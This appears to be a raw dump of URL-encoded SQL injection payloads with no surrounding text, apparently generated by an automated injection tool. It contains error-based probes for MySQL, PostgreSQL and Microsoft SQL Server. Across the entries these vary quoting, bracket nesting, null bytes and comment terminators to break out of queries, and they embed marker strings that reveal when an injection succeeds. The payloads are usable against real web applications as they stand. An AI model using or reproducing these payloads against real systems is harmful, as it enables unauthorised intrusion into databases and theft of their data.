-5053%25%27%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -8791%25%27%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -2269%25%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -6083%00%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -6786%00%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -3467%27%29%20WHERE%208392%3D8392%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -3040%22%29%20WHERE%205855%3D5855%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -2296%29%20WHERE%207611%3D7611%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -2469%27%20WHERE%201624%3D1624%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -2426%22%20WHERE%205647%3D5647%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -9280%20WHERE%204633%3D4633%20OR%201%20GROUP%20BY%20CONCAT%280x3a7870633a%2C%28SELECT%20%28CASE%20WHEN%20%288731%3D8731%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7572733a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -3241%29%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 -8315%27%29%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 -6915%27%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 -5586%22%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 -8250%29%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%283261%3D3261 -6661%29%29%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%283388%3D3388 -2020%29%29%29%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%287263%3D7263 -2383%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 -3510%27%29%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27nshC%27%3D%27nshC -3261%27%29%29%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%27JMJK%27%3D%27JMJK -8215%27%29%29%29%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27lYss%27%3D%27lYss -2918%27%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27isez%27%3D%27isez -6014%27%29%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27gPqh%27%20LIKE%20%27gPqh -6672%27%29%29%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%27RZzo%27%20LIKE%20%27RZzo -1962%27%29%29%29%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27FdbI%27%20LIKE%20%27FdbI -9007%27%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27TRFw%27%20LIKE%20%27TRFw -1683%22%29%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%22xHIk%22%3D%22xHIk -4214%22%29%29%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%22KHKW%22%3D%22KHKW -1946%22%29%29%29%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22HZEU%22%3D%22HZEU -3536%22%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%22JUPW%22%3D%22JUPW -3181%22%29%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%22eNRY%22%20LIKE%20%22eNRY -1921%22%29%29%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%22geRR%22%20LIKE%20%22geRR -5543%22%29%29%29%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22zdeY%22%20LIKE%20%22zdeY -3700%22%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%22HrpC%22%20LIKE%20%22HrpC -2935%25%27%29%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27%25%27%3D%27 -9800%25%27%29%29%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%27%25%27%3D%27 -2005%25%27%29%29%29%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27%25%27%3D%27 -6531%25%27%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27%25%27%3D%27 -5798%00%27%29%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27hTRs%27%3D%27hTRs -3552%00%27%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27zRwV%27%3D%27zRwV -9263%27%29%20WHERE%208808%3D8808%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 -5231%22%29%20WHERE%204003%3D4003%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 -6201%29%20WHERE%203208%3D3208%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 -5468%27%20WHERE%208307%3D8307%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 -2098%22%20WHERE%201509%3D1509%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 -7276%20WHERE%204313%3D4313%20OR%207055%3DCAST%28%28CHR%2858%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%2899%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287055%3D7055%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28117%29%7C%7CCHR%28114%29%7C%7CCHR%28115%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 -5394%29%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29 -9365%27%29%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29 -5310%27%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29 -9139%22%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29 -3820%29%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%289395%3D9395 -6211%29%29%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%287209%3D7209 -5275%29%29%29%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%283932%3D3932 -5724%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29 -5885%27%29%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%27wPot%27%3D%27wPot -8948%27%29%29%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27zKwL%27%3D%27zKwL -8738%27%29%29%29%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27XAEn%27%3D%27XAEn -4621%27%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%27dCUr%27%3D%27dCUr -3828%27%29%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%27jfrE%27%20LIKE%20%27jfrE -5268%27%29%29%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27xgfY%27%20LIKE%20%27xgfY -7477%27%29%29%29%20OR%207692%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%2899%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%287692%3D7692%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28117%29%2BCHAR%28114%29%2BCHAR%28115%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27eanD%27%20LIKE%20%27eanD 